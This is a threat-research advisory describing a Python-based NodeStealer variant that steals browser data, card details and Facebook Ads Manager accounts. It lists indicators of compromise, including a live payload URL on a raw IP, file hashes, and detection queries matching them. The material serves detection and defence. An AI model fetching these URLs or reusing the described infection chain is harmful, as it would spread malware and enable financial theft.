Python-Based NodeStealer Version Targets Facebook Ads Manager

    Thursday, December 26, 2024 In: Threat Research Print

    Date: 12/26/2024

    Severity: High 

    Summary

    The NodeStealer malware has evolved from JavaScript to Python, enhancing its ability to steal sensitive data. Our team uncovered this updated variant in a campaign targeting a Malaysian educational institution, linked to a Vietnamese group. It harvests browser data, credit card details, and Facebook Ads Manager accounts for financial information. The infection begins with a spear-phishing email, deploying the malware disguised as a legitimate app, using DLL sideloading and encoded PowerShell commands to evade detection and exfiltrate data via Telegram.

    Indicators of Compromise (IOC) List

    Domains\Urls : 

    https://t.ly/MRAbJ

    http://88.216.99.5:15707/entry.txt

    Hash : 

    f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71

1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66

786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains\Urls : 

    userdomainname like "https://t.ly/MRAbJ" or url like "https://t.ly/MRAbJ" or userdomainname like "http://88.216.99.5:15707/entry.txt" or url like "http://88.216.99.5:15707/entry.txt"

    Hash :

    sha256hash IN ("f813da93eed9c536154a6da5f38462bfb4ed80c85dd117c3fd681cf4790fbf71","1c9c7bb07acb9d612af2007cb633a6b1f569b197b1f93abc9bd3af8593e1ec66","786db3ddf2a471516c832e44b0d9a230674630c6f99d3e61ada6830726172458")

    Reference:   

    https://www.trendmicro.com/en_us/research/24/l/python-based-nodestealer.html 


    Tags

    MalaysiaNodeStealerFacebookMalwareFinancial Services

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.